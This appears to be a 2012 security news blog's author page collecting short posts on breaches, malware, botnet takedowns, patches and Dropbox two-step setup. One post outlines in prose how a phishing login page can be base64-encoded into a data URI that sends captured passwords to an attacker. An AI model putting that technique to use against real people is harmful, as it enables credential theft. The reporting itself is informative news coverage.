All posts by Nithin Ramesh

Nithin is a blogger and a Windows security enthusiast. He is currently pursuing Bachelors in Electronics and Communication. Apart from technology his other interests include reading and rock music. His Twitter handle is @nithinr6

Researcher Discovers 100k IEEE User Passwords on Public FTP

If you are a member of IEEE, it might be the time for you to change the password.

A Romanian university teaching assistant, Radu Dragusin, has discovered a publicly accessible FTP server that stored around 100,000 usernames and passwords in plain text.  The passwords where found in logs stored on the FTP server. There where around 100GBs of logs which contained 376 million HTTP requests. Out of these, 411,308 entries contained passwords.

He reported the vulnerability to the officials on September 24th and they are rectifying the issue at the moment. The FTP server which contained the information has been taken offline and they are sending password reset email to all those affected. But we are yet to see a public statement from them.

IEEE, if you are not aware, stands for Institute of Electrical and Electronic Engineers and is an international organization that promotes technology and science. Its members include high position holders from various prestigious institutions. Radu says that the logs consisted passwords of Apple, Google, IBM, Oracle and Samsung employees, as well as researchers from NASA, Stanford etc. The data is assumed to have been available online for about a month. But it is not certain whether the data has been acquired by hackers.

IEEE officials will have to answer a lot of questions in the coming days. Most importantly, why was the password stored as plain text. Secondly, why was the FTP server permissions not set correctly, when it contained massive amount of logs. Hopefully, they will rectify the issues as soon as possible and this should be a cue for others to secure the customer’s data.

Source: IEEE Log

Flame Command & Control Server Password Cracked

Flame was arguably the next big thing in the state sponsored malware section after Stuxnet. If you are not aware, Flame is a malware that was used to infect computers in the Middle East for espionage purposes.

Flame was investigated by a joint effort of Kaspersky, Symantec, ITU-IMPACT and CERT-Bund/BSI. Symantec had earlier failed to crack the password of Flame’s Control Centre and had put out a blog post asking for help in cracking the hash, 27934e96d90d06818674b98bec7230fa. Dmitry Bestuzhev of Kaspersky cracked the hash to find the clear text password as 900gage!@#. We are not yet aware of the method he used to crack the hash.

The decoding of the hash led to the researchers being able to see the Command-and-Control servers for the Flame malware. Kaspersky has posted a detailed blog post analyzing the C&C. All of the servers were running a 64-bit version of Linux called Debian. The programming languages used where PHP, Python and bash and virtualization was run under OpenVZ.

An initial look at the C&C revealed that the attackers had used a minimal interface with no terms such as bot or botnet, possibly to avoid suspicion of hosting company. There was no way to send commands to the C&C as well.

To send a command or set of commands to a victim, the attacker uploaded a specially crafted tar.gz archive, which was processed on the server. A special server script extracted the archive contents and looked for *.news and *.ad files. These files were put into corresponding directories “news” and “ads”. The C&C allows an attacker to push an update to a specific victim, or all victims at a time. It is possible to prioritize a command which allows to organize an order of commands (i.e. collect all data and only after self-removal). The priority and target client ID was transferred in an unconventional way. They were stored in the filename that the attacker uploaded to a C&C.

The researchers also discovered three protocols – SP, SPE, FL and IP which were used to communicate with different clients of which, Flame was identified as FL. This suggests that there are three more Flame like malware in the wild which have not been discovered yet.

The analysis of the C&C shows that servers were first setup on 03 December, 2006 which suggests that Flame was operational for much longer than what we had first thought. The scripts used by the operators also contained other valuable information, the nick name of the developers. Kaspersky hasn’t published their names and has only identified them as D, H, O and R in the blog post.

You can read more about the Kaspersky’s analysis of Flame’s C&C here and a whitepaper by Symantec on Flame here [PDF].

Microsoft Issues Fix It for Internet Explorer Zero Day Vulnerability

A few days ago, we reported a new vulnerability in Microsoft’s Internet Explorer that could allow an attacker to execute code remotely on an affected PC. The vulnerability had been spreading fast and had been added to free attack tools used by hackers.

Microsoft has now issued an interim solution in the form of a Fix It tool which can be downloaded from here. In a blog post published today, Microsoft’s Yunsun Wee says that the tool is a one click solution that will protect users right away and that it will not hinder user’s web browsing in any way. You wont have to reboot your computer as well.

Microsoft will be releasing an out-of-band security update, MS12-063 this Friday to close the vulnerability. The update will be rated critical and will address the zero day vulnerability (Security Advisory 2757760) along with four other remote code execution issues. Users who downloaded the FixIt solution need not uninstall it before installing the update.

If you have automatic updates enabled, the update will be installed automatically and if you don’t, make sure that you install the update so that your computers are not vulnerable. Also, I highly recommend installing the FixIt solution right now to prevent any zero day attacks.

Microsoft Disrupts Nitol Botnet

In an operation named Operation b70, Microsoft was able to disrupt the Nitol botnet that was used to spread malware and launch DDoS attacks. The operation was carried out by Microsoft’s Digital Crimes Unit with the permission of U.S. District Court for the Eastern District of Virginia.

The operation was a result of a study conducted by Microsoft which discovered hackers selling pirated copies of Windows that was embedded with malware. They then got these copies into different unsecured (a distributor or reseller selling products from unconfirmed or unauthorized sources) supply chains for distribution. In the research, it was found that about 20% of pirated copies of Windows consisted of different types of malware.

These malware was used for a multitude of illegal purposes including stealing passwords, credit card information and even remotely turning on the microphone and webcam connected to the victim’s computer.

The computers that were part of the Nitol botnet was controlled by a Nitol command server. The DNS of the server was found to be provided by a rogue website called 3322.org which has been known to be a part of several targeted attacks in the past. With the successful takedown of 3322.org, Microsoft was also able to take down around 500 different strains of malware stored in 70,000 sub-domains of the rogue website.

The operation was part of Microsoft’s wider MAPS (Microsoft Active Response for Security) program which is intended to protect Windows users against malware. This is the second such action against botnets by Microsoft, which had taken down Zeus botnet earlier this year.

Via: Official Microsoft Blog

Godaddy Sites Back Online After Outage

A large number of websites that were either hosted or using GoDaddy name servers went down for more than four hours today following an outage in their DNS server. GoDaddy has been working to fix the issue and now it looks like almost all sites are back online.

There are speculations on what caused the glitch with some blaming it on the online vigilante group, Anonymous. A Brazilian twitter user loosely affiliated with Anonymous even tweeted the following, taking responsibility of the outage.

I’m taking godaddy down bacause well i’d like to test how the cyber security is safe and for more reasons that i can not talk now.

GoDaddy has been in the receiving end of similar attacks by Anonymous after their support to the infamous anti-piracy bill SOPA. But we are not yet able to verify whether this outage was a result of any kind of attack and there’s a good chance that this might just be a glitch in their DNS configuration. GoDaddy, while not mentioning whether the outage was a result of a DDoS attack, has tweeted that there was no compromise of user data.

WIRED is also reporting that GoDaddy has migrated some of the DNS records to VeriSign following the outage. It is not yet clear whether they are migrating the whole DNS configurations from the affected server or just the one for GoDaddy’s website which was also affected by the outage.

Brazilian Trojan Issued Digital Certificate; Revoked Later

Wikipedia defines a digital certificate as ‘an electronic document which uses a digital signature to bind a public key with an identity — information such as the name of a person or an organization, their address, and so forth. The certificate can be used to verify that a public key belongs to an individual.’

In the case of software, it is used to ensure that the software is what it claims. Operating Systems use digital certificates to make sure that an application that is being installed is valid. But what if the digital certificate is obtained by giving fake information?

There have been cases in the past were malware authors used stolen digital certificates for their rogue apps. But according to a report from Kaspersky, a group of Brazilian Trojan authors was able to obtain genuine certificates from Comodo by using fake data.

The authors used a fake company name gastecnology.org for obtaining the certificate. As shown in the Securelist blog, a simple DNS lookup of that particular domain name gives use some clues as to the veracity of that company.

Firstly, the email address used to register the account is a free Yahoo Mail account and secondly, the phone number as well as the address provided was fake.

After obtaining the digital certificate, the malware authors used an extensive email campaign to spread the malware. The certificate has been revoked since then and the application is now flagged as malware.

Although the certificate was revoked, the big question here is why the certificate was allowed in the first place. Since digital certificate plays an integral part in verifying the validity of an application, signing an application should be only done after verifying the submitted data which was not the case here. Hopefully certification authorities will be more careful after this incident.

Phishing 2.0; Phishing Without Fake Webpages

Nowadays everyone will be familiar with phishing attacks. It is basically the process of obtaining confidential information from a person by communicating with the victim (using emails, phone calls etc.) posing as someone else. The typical phishing attack includes creating a fake login page, storing them in a server and emailing the victim with the fake login page link. Now a new research paper from InfoSec student, Henning Klevjer shows how a hacker can create phishing attacks without the need for storing the fake login page on a server.

This method uses URI or universal resource identifier which is basically a string of characters that are used to identify a name or a resource. Using URI, the required data (the code for login page in this case) is stored within the URI with the following scheme

data:[<mediatype>][;base64],<data> 

Here <data> will contain the fake login page. The procedure for creating a phishing URI starts with creating a login page using the code from the original page.  The original code is modified accordingly so that the entered data such as password are sent to a location as desired  by the hacker. This page is then encoded using a scheme called Base64. Base64 is a method of encoding binary data to ASCII format which will increase the data size by around 33%. The next and the final step is to append this information to the URI.

The final URI will be extremely long and suspicious looking one. But as all browsers support legacy URI schemes, it will be rendered properly, as long as it doesn’t extend more than the maximum URL limit allowed by the browser.

Although, the large URI can be masked using a URL shortening service, Henning states that this method has some major limitations thanks to implementation of data URIs in Chrome and Internet Explorer.

You can read more about this method here(PDF).

Via: Naked Security

Another day, Another Java Vulnerability Discovered!

So you have read about the recent vulnerabilities discovered in Java that attackers used to spread malware? Have you installed the latest out-of-band update that Oracle released in order to close those vulnerabilities? Think it’s time to move on to other stories? Well, think again.

Computer World is reporting that another serious vulnerability in the latest update has been discovered that could allow an attacker to escape the Java security sandbox and run arbitrary code on your system. The vulnerability was discovered by a Polish security firm called Security Explorations and has been reported to Oracle, according to their CEO, Adam Gowdiak. He has also stated that they will not be releasing any technical details on the vulnerability until Oracle issues a fix.

In an email to IDG News Service, he states,

“Once we found that our complete Java sandbox bypass codes stopped working after the update was applied, we looked again at POC codes and started to think about the possible ways of how to fully break the latest Java update again,” Gowdiak said. “A new idea came, it was verified and it turned out that this was it.”

Oracle hasn’t hinted whether they will be releasing an out-of-band update like the previous one or just include the patch in the scheduled October update. With vulnerabilities being discovered at such a fast pace, it might be time for Oracle to re-consider their four month update cycle. With the time span for fixing these vulnerabilities increasing, the chances of these vulnerabilities being used to attack users also increase leaving users with greater risk.

At this moment, the best option for you is to disable Java if you don’t really use it. Alternately, you can disable Java in your primary browser and use a secondary browser only to use web apps that require Java (if you absolutely need to use those web apps and are sure that those are not rogue) so that you don’t wander into compromised websites that make use of Java vulnerabilities.

First Cross Platform Trojan Affecting Linux and Mac OS X Revealed

Russian security firm Dr.Web has identified a new Trojan named BackDoor.Wirenet.1 which runs on both Linux as well as Mac OS X. This is the first ever cross platform Trojan that has been discovered to affect both of the aforementioned operating systems.

At the moment, a lot of information is not available on this malware. But the research is going on and it is said to steal passwords from all of the popular browsers such as Safari, Chrome, Opera and Chromium. It also steals passwords from applications such as Thunderbird, SeaMonkey and Pidgin.

According to Dr.Web, when executed, the Trojan copies itself to the user’s home directory – that is % home%/WIFIADAPT.app.app in MAC OS X and ~/WIFIADAPT in Linux.

Cross platform Trojans are not rare. Trojans that affect Windows and Macs have been identified in the past. A recently discovered Trojan used to check which Operating System the affected user was running and downloaded the payload accordingly. Another one was discovered in May that used unpatched Java vulnerability to open backdoors in Windows and Mac. But as I mentioned before, this is the first time that a cross platform Trojan affecting Mac and Linux has been discovered.  We will be updating this article as more details are released.

Via : Hacker News

How to Enable Two-step Verification for Dropbox

Dropbox has been under fire more than once for their inability to protect user’s data. But now it looks like they are finally improving their security. Dropbox has now added an option to use two step authentication for all of its users. Here’s how to enable it.

First, login to your Dropbox account and open their Security page.

You will find a new option to enable two-step authentication in the bottom as shown below. It will be disabled at the moment. Click Change.

You will have to enter your password to proceed. Then you will see a webpage overlay like shown below. Click Get Started.

You can  choose to receive the authentication codes as text messages to your phone. Alternately, if you own a smartphone, you can use an authenticator app to generate authentication codes locally. Select the desired option and click ‘Next’.

Now if you selected the option to receive code via text message, enter your mobile number or if you chose to use the authenticator app, scan the provided QR code using any supported authenticator app.

When done, click ‘Finish’. You have now enabled two step verification for Dropbox.

You will have to download and install the Dropbox application for your OS again with the latest versions that support 2-factor authentication.